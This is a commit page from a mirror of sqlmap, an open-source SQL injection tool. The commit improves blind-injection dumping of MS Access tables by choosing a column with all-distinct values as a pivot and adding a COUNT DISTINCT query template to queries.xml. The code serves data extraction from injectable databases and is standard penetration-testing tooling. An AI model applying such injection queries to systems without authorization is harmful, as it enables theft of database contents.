sqlmapproject/sqlmap
1
1
Fork 0
mirror of https://github.com/sqlmapproject/sqlmap.git synced 2025-06-08 23:23:12 +03:00
Code Issues Packages Projects Releases Wiki Activity

further improvement for ms access table dumping

Browse Source
This commit is contained in:
Miroslav Stampar 2010-12-26 01:04:30 +00:00
parent 64523212a4
commit 2c8115eed9
2 changed files with 12 additions and 4 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

14
plugins/generic/enumeration.py
View File

@ -1212,10 +1212,18 @@ class Enumeration:
if kb.dbms == DBMS.ACCESS: if kb.dbms == DBMS.ACCESS:
for column in colList: for column in colList:
# It would be good to have a numeric column as a pivot infoMsg = "fetching number of distinct "
result = inject.checkBooleanExpression("%s" % safeStringFormat("EXISTS(SELECT %s FROM %s WHERE RND(%s)>0)", (column, conf.tbl, column))) infoMsg += "values for column '%s'" % column
logger.info(infoMsg)
query = rootQuery.blind.count2 % (column, conf.tbl)
value = inject.getValue(query, inband=False)
if isNumPosStrValue(value) and value == count:
infoMsg = "using column '%s' as a pivot " % column
infoMsg += "for retrieving row data"
logger.info(infoMsg)
if result:
colList.remove(column) colList.remove(column)
colList.insert(0, column) colList.insert(0, column)
break break

2
xml/queries.xml
View File

@ -359,7 +359,7 @@
<tables/> <tables/>
<dump_table> <dump_table>
<inband query="SELECT %s FROM %s"/> <inband query="SELECT %s FROM %s"/>
<blind query="SELECT MIN(%s) FROM %s WHERE CVAR(%s) > '%s'" query2="SELECT TOP 1 %s FROM %s WHERE CVAR(%s) LIKE '%s'" count="SELECT COUNT(*) FROM %s"/> <blind query="SELECT MIN(%s) FROM %s WHERE CVAR(%s) > '%s'" query2="SELECT TOP 1 %s FROM %s WHERE CVAR(%s) LIKE '%s'" count="SELECT COUNT(*) FROM %s" count2="SELECT COUNT(*) FROM (SELECT DISTINCT %s FROM %s)"/>
</dump_table> </dump_table>
</dbms> </dbms>